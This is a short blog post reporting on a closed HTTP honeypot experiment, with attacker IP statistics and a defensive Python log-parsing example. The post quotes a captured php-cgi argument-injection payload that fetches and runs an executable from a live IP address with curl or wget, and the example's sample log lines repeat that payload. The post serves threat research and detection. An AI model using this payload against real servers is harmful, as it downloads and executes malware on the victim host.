HTTP Honeypot experiment
- Matei
- Jan 21, 2025
- 1 min read
I've closed our little HTTP Honeypot experiment. Since our last report, we had an additional spike, and got some very interesting new payloads in our wordlists such as: /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('curl%20-L%20-k%20-O%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe%20%7C%7C%20wget%20--no-check-certificate%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe');?>
Check out the JoeSandbox report for the EXE that the payload above tried to drop: https://lnkd.in/dwegSJ-2
Check out the project on GitHub, including our updated wordlist: https://lnkd.in/dTvMKMCR
Check out our draft report from last week on the HiveHack page: https://lnkd.in/dJ6SuhQk
Some additional data:
Top 10 IPs by request count:
IP                  Count
146.235.220[.]43     7112
173.249.10[.]225     7111
43.134.58[.]129      1130
213.136.70[.]28       476
213.136.86[.]62       159
101.32.192[.]203      125
156.146.36[.]72        81
217.15.164[.]190       77
78.153.140[.]158       48
78.153.140[.]156       45
Average number of requests per hour: 57.99
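As an added example (not code from the honeypot project), here is how a defender could process honeypot log lines like the ones behind the stats above: URL-decode each request target, flag the php-cgi argument-injection shape of the quoted payload (an encoded newline followed by a <?php block), pull out the dropper URL as a defanged IoC, and compute the top-IP and requests-per-hour figures. The log format, the helper names and the sample lines are assumptions constructed for the example; the payload lines only mimic the shape of the one quoted in the post.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import unquote, urlsplit

# Constructed honeypot log lines (timestamp, client IP, method, target); the php-cgi
# payloads mirror the shape of the one quoted in the post, not the project's real log.
SAMPLE_LOG = """\
2025-01-18T10:02:11Z 146.235.220.43 GET /
2025-01-18T10:02:12Z 173.249.10.225 GET /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('curl%20-L%20-k%20-O%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe');?>
2025-01-18T11:15:40Z 146.235.220.43 GET /.env
2025-01-18T12:30:05Z 43.134.58.129 GET /cgi-bin/php-cgi.exe?arg=%0a%0a<?php%20system('wget%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe');?>
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")  # assumed log layout
URL_RE = re.compile(r"https?://[^\s'\"]+")

def parse_log(text):
    """Return (timestamp, ip, decoded_target) for each well-formed line."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            rows.append((ts, m.group(2), unquote(m.group(4))))
    return rows

def is_cgi_header_injection(target):
    """The %0a in the quoted payload decodes to a newline inside a php-cgi argument,
    which is what lets the sender smuggle headers and a <?php block; flag that shape."""
    return "php-cgi" in target and "\n" in target and "<?php" in target

def defang(url):
    """Bracket the dots of the host so the IoC cannot be clicked or auto-fetched."""
    p = urlsplit(url)
    return f"hxxp://{p.netloc.replace('.', '[.]')}{p.path}"

def extract_dropper_urls(target):
    """Pull the download URLs out of a decoded payload, defanged, deduplicated."""
    return sorted({defang(u) for u in URL_RE.findall(target)})

def summarize(rows):
    """Top-10 client IPs and average requests per active hour, like the post's stats."""
    ips = Counter(ip for _, ip, _ in rows)
    hours = {ts.replace(minute=0, second=0) for ts, _, _ in rows}
    return {"top_ips": ips.most_common(10), "avg_per_hour": len(rows) / len(hours)}
```

On the sample lines only the two php-cgi requests are flagged, and both yield the same defanged dropper URL.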
PS: I am going to publish some more complex honeypots in the future. I would like to publish this one again, but I am seeking your advice on how to get more humans to interact with it. There are some ideas for next steps in the draft report, but I would appreciate your feedback!
